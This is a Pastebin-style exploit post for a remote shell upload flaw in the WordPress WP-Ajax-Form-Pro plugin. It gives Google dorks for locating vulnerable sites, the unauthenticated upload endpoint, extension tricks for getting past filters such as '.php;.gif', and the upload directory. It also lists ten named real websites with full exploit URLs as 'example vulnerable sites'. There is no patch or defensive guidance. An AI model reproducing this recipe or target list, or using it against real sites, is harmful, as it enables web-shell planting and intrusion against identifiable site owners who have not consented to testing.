Advertisement
KingSkrupellos

WordPress WP-Ajax-Form-Pro Plugins 5.0.2 Remote Shell Upload

Dec 23rd, 2018
982
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.17 KB | None | 0 0
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress WP-Ajax-Form-Pro Plugins 5.0.2 Remote Shell Upload Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 22/12/2018
  6. # Vendor Homepage : wordpress.org ~ ajaxformpro.com
  7. # Software Download Link : ajaxformpro.com
  8. # Software Script Owner and Developer : Gabriel Livan
  9. # Software Price : 19$ ~ 39$ ~ 89$
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Version Information : 4.9.9 and 5.0.2
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/wp-content/plugins/wp-ajax-form-pro/''
  15. + intext:''PRISMATIBRO, SWEDEN''
  16. + intext:''2015 MSSNRI | Membership Site | MSS Nurses Registry, Inc.''
  17. + intext:''Site by ECI!''
  18. + intext:''© 2006 - 2018 Shaw IT Services''
  19. + intext:''Historic Rentals Blog Homepage. This blog is powered by WordPress.''
  20. + intext:''Copyright 2014 - AJAX Form Pro - All Rights Reserved''
  21. + intext:''Powered by OptimizePress 2.0''
  22. + intext:''Powered by PIGO Multimedia, Inc.''
  23. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  24. + CWE-434 - [ Unrestricted Upload of File with Dangerous Type ]
  25.  
  26. #################################################################################################
  27.  
  28. # Admin Panel Login Path :
  29.  
  30. /wp-login.php
  31.  
  32. # Arbitrary File Upload/Remote Shell Upload Exploit :
  33.  
  34. /wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
  35.  
  36. # Directory File Path :
  37.  
  38. /wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/uploads/......
  39.  
  40. # Note : .php;.gif ~ .asp;.png ~ .shtml.fla;.jpeg ~ jpg ~ gif ~ png ~ docx ~ pdf
  41.  
  42. #################################################################################################
  43.  
  44. # Example Vulnerable Sites =>
  45.  
  46. [+] ajaxformpro.com/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
  47.  
  48. [+] prismatibro.se/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
  49.  
  50. [+] mssregistryinc.com/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
  51.  
  52. [+] shadowbrooktchoa.com/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
  53.  
  54. [+] peachtreebennett.com/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
  55.  
  56. [+] mretec.com/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
  57.  
  58. [+] vipbraids.com/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
  59.  
  60. [+] dbwiztech.com/quickl/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
  61.  
  62. [+] shawitservices.com.au/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
  63.  
  64. [+] historicrentals.com/wordpress/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
  65.  
  66. #################################################################################################
  67.  
  68. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  69.  
  70. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement